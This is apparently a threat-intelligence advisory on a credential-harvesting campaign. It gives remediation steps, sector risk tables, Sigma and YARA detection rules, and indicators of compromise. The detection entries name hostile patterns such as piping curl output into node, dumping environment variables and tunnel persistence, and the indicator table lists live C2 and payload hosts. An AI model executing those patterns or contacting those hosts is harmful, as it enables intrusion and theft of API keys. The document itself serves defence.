
Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation
Indicators of Compromise
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
Step | Action | Detail |
|---|---|---|
1 -- Isolate | Network-isolate the affected server | Do not shut down -- keep running to preserve memory (NKN agent is fileless). Block all IOCs at perimeter. Terminate active sessions. |
2 -- Preserve | Collect forensic evidence | Memory dump (avml/LiME). Preserve: bash_history, /tmp contents, web server logs, netstat -anp, /proc/*/cmdline. Take disk image before cleanup. |
3 -- Hunt | Search and remove all persistence mechanisms | Kill and delete from /tmp: d2, pl, l64, cf-client, p2p-client. Scan web directories for webshells (.php, .jsp, .aspx). Check cron jobs and systemd services. Run YARA 7.1-7.4 on all web servers in the same network segment. |
4 -- Rotate | Rotate every credential on the affected system | AI API keys (OpenAI, Anthropic, Gemini, Azure, DeepSeek, Moonshot, Firecrawl), Stripe sk_live_* keys, GitHub tokens, DB passwords, AWS access keys. Check Stripe Logs for /v1/balance calls and unauthorized charges. |
5 -- Audit | Audit API usage for active key abuse | OpenAI/Anthropic usage dashboards: look for off-hours spikes or unknown IPs. Stripe Logs: filter /v1/account and /v1/balance calls. GitHub Security Log: unauthorized API calls or repo access. AWS CloudTrail: unexpected Lambda invocations. |
6 -- Rebuild | Rebuild from a trusted clean image | Do not restore from the compromised disk. Deploy application code from version control. Inject secrets via Secrets Manager -- never use .env again on internet-exposed servers. Validate CVE patches before bringing the new instance online. |
Sector | Key Risk | Priority Action |
|---|---|---|
Web3 / Crypto | Primary FOFA target; ~100K crypto addresses monitored by attacker | Rotate wallet integration keys. Audit smart contract access logs. Verify no unauthorized address monitoring. |
Fintech / Payments | Stripe sk_live_* keys validated and tested within hours of harvest | Check Stripe Logs for /v1/account and /v1/balance calls NOW. Rotate all live Stripe keys. Enable Radar fraud rules. |
AI / ML Platforms | OpenAI, Anthropic, Gemini, DeepSeek, Moonshot, Firecrawl keys are the primary harvest target | Rotate all AI keys immediately. Check usage dashboards for abnormal consumption. Set spend alerts per key. |
Cloud-Native / SaaS | AWS Lambda credentials, DATABASE_URL, GitHub tokens harvested -- enables cloud lateral movement | CloudTrail: unauthorized Lambda calls. GitHub: token misuse and secret scanning alerts. Rotate all cloud credentials. |
Security Vendors | Explicitly targeted in FOFA queries; hold customer intelligence and elevated trust relationships | Audit FOFA visibility. Patch all internet-exposed React and Java apps. Review customer data access logs. |
Detection Quick Reference
Rule | Type | Detects | Priority |
|---|---|---|---|
Sigma-8.1 | SIEM | Env variable dump executed from web server process -- direct exploitation indicator | CRITICAL |
Sigma-8.2 | SIEM | curl URL | node or echo base64 | node -- fileless NKN C2 agent delivery | HIGH |
Sigma-8.3 | SIEM | cf-client + trycloudflare.com -- Cloudflare tunnel SSH persistence | HIGH |
Sigma-8.4 | SIEM | Outbound connection to nkn.org:30003 -- decentralized C2; no legitimate enterprise use | HIGH |
Sigma-8.5 | SIEM | api.stripe.com + sk_live_ in process cmd -- stolen Stripe key validation | CRITICAL |
YARA-7.1 | EDR | React2Shell exploit scripts (3.py / 11.py): FOFA keywords, WAF bypass, env dump | HIGH |
YARA-7.2 | EDR | NKN fileless C2 agent: mainnet-seed addresses, CONTROL_ID, workers.dev, Node crypto | HIGH |
YARA-7.3 | EDR | Credential harvest file: AI API key names, Stripe strings, harvested_keys pattern | HIGH |
YARA-7.4 | EDR | Persistence: cf-client + trycloudflare.com, p2p-client + mayun, /tmp/l64 drop path | HIGH |
Indicator | Type | Block Method |
|---|---|---|
124[.]220[.]164[.]14 | C2 IP / Reverse Shell (port 33306) | Firewall egress -- all ports |
soft-silence-d978[.]13544681192[.]workers[.]dev | Fileless C2 Delivery | DNS block + proxy filter |
d6[.]tfdl[.]net | Payload Delivery (NKN agent, cf-client) | DNS block + proxy filter |
anson-aeromarine-ocularly[.]ngrok-free[.]dev | Tor Proxy Endpoint | DNS block |
kf[.]unpkg[.]top | Malicious Domain | DNS block |
deltajohnsons[.]com | FOFA Account Registration Domain | DNS block + threat intel feed |
*.nkn.org port 30003 | NKN P2P C2 Seed Nodes | Firewall: block outbound port 30003 |
Operator Email | Threat intel feed | |
Operator Account | Threat intel feed |